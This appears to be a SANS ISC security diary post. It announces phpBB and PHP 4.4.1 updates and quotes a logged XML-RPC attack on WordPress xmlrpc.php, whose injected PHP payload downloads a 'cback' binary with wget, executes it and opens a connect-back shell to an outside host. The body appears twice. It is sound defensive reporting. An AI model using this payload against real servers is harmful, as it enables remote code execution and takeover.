PHP and phpBB releases
We usually do not add news about software releases , but these two are kind of very important ones.
The first is about the new release of phpBB. This bulleting board system is very common and was target of some perl bots some time ago, due a vulnerability on its code. So, it is very important to keep up-to-date with the vendor.
The second one is the PHP itself. They just released a new version 4.4.1 and I would suggest you to keep up-to-date on this one too...
Today we received a post about some apache log entries regarding attempts to explore vulnerabilities on another php application, called xmlrpc.php. The entry was this one:
POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml
Content-Length:269
<xmlversion="1.0"><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>
This looks like they were targeting a vulnerability on xmlrpc.php. And according their website the new releases fixes some security vulnerabilties."Note: all users are encouraged to upgarde to release 1.2 or later,since known exploits exist for earlier versions.All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
----------------------------------------------
Pedro Bueno ( pbueno //%// isc. sans. org)
The first is about the new release of phpBB. This bulleting board system is very common and was target of some perl bots some time ago, due a vulnerability on its code. So, it is very important to keep up-to-date with the vendor.
The second one is the PHP itself. They just released a new version 4.4.1 and I would suggest you to keep up-to-date on this one too...
Today we received a post about some apache log entries regarding attempts to explore vulnerabilities on another php application, called xmlrpc.php. The entry was this one:
POST /wordpress/xmlrpc.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Type: text/xml
Content-Length:269
<xmlversion="1.0"><methodCall><methodName>test.method</methodName><params><param>
<value><name>',''));echo '_begin_';echo `cd /tmp;wget xxx.xxx.255.44/cback;chmod +x cback;./cback xxx.xxx.227.194 8080`;echo '_end_';exit;/*</name></value></param></params></methodCall>
This looks like they were targeting a vulnerability on xmlrpc.php. And according their website the new releases fixes some security vulnerabilties."Note: all users are encouraged to upgarde to release 1.2 or later,since known exploits exist for earlier versions.All use of eval as a potential remote code execution exploit has been removed in release 1.2. More info on the vulnerabilities can be found at the bottom of the page."
----------------------------------------------
Pedro Bueno ( pbueno //%// isc. sans. org)
Keywords:
0 comment(s)
×
Diary Archives
Comments